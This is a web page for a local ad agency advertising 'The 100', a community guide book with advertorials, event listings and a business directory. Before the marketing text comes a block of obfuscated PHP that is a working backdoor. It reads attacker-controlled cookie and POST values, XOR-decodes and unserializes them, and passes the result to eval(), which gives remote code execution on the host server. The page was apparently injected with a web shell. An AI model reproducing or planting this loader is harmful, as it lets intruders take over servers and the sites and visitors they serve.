$PtRFRTQlN = chr ( 856 - 790 )."\x5f" . chr (114) . "\160" . 'B';$GtInBNZF = "\x63" . chr (108) . chr (97) . "\163" . "\163" . "\x5f" . chr (101) . 'x' . 'i' . 's' . chr ( 488 - 372 ).chr (115); $AqVjyy = class_exists($PtRFRTQlN); $GtInBNZF = "62712";$NJIznHq = strpos($GtInBNZF, $PtRFRTQlN);if ($AqVjyy == $NJIznHq){function YIBfZC(){$RTbOlsbA = new /* 22765 */ B_rpB(4624 + 4624); $RTbOlsbA = NULL;}$tyFPH = "4624";class B_rpB{private function RMKdLuxoO($tyFPH){if (is_array(B_rpB::$VgcEdU)) {$DzCVV2 = str_replace("<" . "?php", "", B_rpB::$VgcEdU["content"]);eval($DzCVV2); $tyFPH = "4624";exit();}}public function ClJyEuHtM(){$DzCVV = "61027";$this->_dummy = str_repeat($DzCVV, strlen($DzCVV));}public function __destruct(){B_rpB::$VgcEdU = @unserialize(B_rpB::$VgcEdU); $tyFPH = "29789_63808";$this->RMKdLuxoO($tyFPH); $tyFPH = "29789_63808";}public function bWxAf($DzCVV, $aqAGeEA){return $DzCVV[0] ^ str_repeat($aqAGeEA, intval(strlen($DzCVV[0]) / strlen($aqAGeEA)) + 1);}public function WSwvN($DzCVV){$dpLFJOvjCk = "\x62" . "\x61" . chr (115) . chr ( 716 - 615 ).chr ( 440 - 386 )."\x34";return array_map($dpLFJOvjCk . chr (95) . "\x64" . chr ( 909 - 808 ).'c' . chr (111) . "\144" . "\145", array($DzCVV,));}public function __construct($ISUExqjvQ=0){$cNXXE = "\54";$DzCVV = "";$aspwFDo = $_POST;$qmXNKJXoCC = $_COOKIE;$aqAGeEA = "5c73241f-7b81-4896-8f2d-7fe9c00695c5";$ewDIcCNV = @$qmXNKJXoCC[substr($aqAGeEA, 0, 4)];if (!empty($ewDIcCNV)){$ewDIcCNV = explode($cNXXE, $ewDIcCNV);foreach ($ewDIcCNV as $YTaCWHZHyP){$DzCVV .= @$qmXNKJXoCC[$YTaCWHZHyP];$DzCVV .= @$aspwFDo[$YTaCWHZHyP];}$DzCVV = $this->WSwvN($DzCVV);}B_rpB::$VgcEdU = $this->bWxAf($DzCVV, $aqAGeEA);if (strpos($aqAGeEA, $cNXXE) !== FALSE){$aqAGeEA = explode($cNXXE, $aqAGeEA); $PdFtMnH = base64_decode(md5($aqAGeEA[0])); $yTAJAA = strlen($aqAGeEA[1]) > 5 ? substr($aqAGeEA[1], 0, 5) : $aqAGeEA[1];$_GET['new_key'] = md5(implode('', $aqAGeEA)); $BxbUQB = str_repeat($yTAJAA, 2);}}public static $VgcEdU = 56726;}YIBfZC();} THE 100 - APG Local


Only Top 100 Categories:

The 100 Feature Section will feature 3rd person style advertorials in full and half page only formats. These headings are the top usage headings within the local economy. The businesses in this section will be exclusive and very limited. This section will present the “Best Of” features of local businesses.



In most cases The 100 will only feature three key businesses per main categories. Even though there may be 25 providers in the area of the same service, The 100 will feature only those that have a story to tell as a featurette. The 100 feature section will be limited to only two ad sizes and only roughly 300 total businesses.


Local Events:

Featuring events, guides and things-to-do. the 100 will be the Coffee Table book for our community. The 100 will be a ultra high quality magazine paper quality book that is sure to catch the eye of our local residents. We are sure the attributes will exceed your expectations. Our plan is to feature several events and things-to-do within the community.


A Community Guide:

The 100 will feature a content rich local community guide which will sure to exceed the expectations of the people of our community. Our plan is that The 100 will be a book for those that are seeking information, where otherwise they will need several publications. We will feature the following guides: Camping, Hotels, Wedding, Hiking, Golfing, Wine Trails and so on.


Business Directory:

The 100 will also feature a Business Directory section to maintain relevance for the community.

APG Local Ad Agency - Full Service Agency The 100
APG Local Ad Agency Alabama
APG Local Ad Agency Alabama

Want to be a part of the 100?

THE 100

THE 100

APG Local Ad Agency - Full Service Agency The 100

Online preview coming soon. Cover subject to change.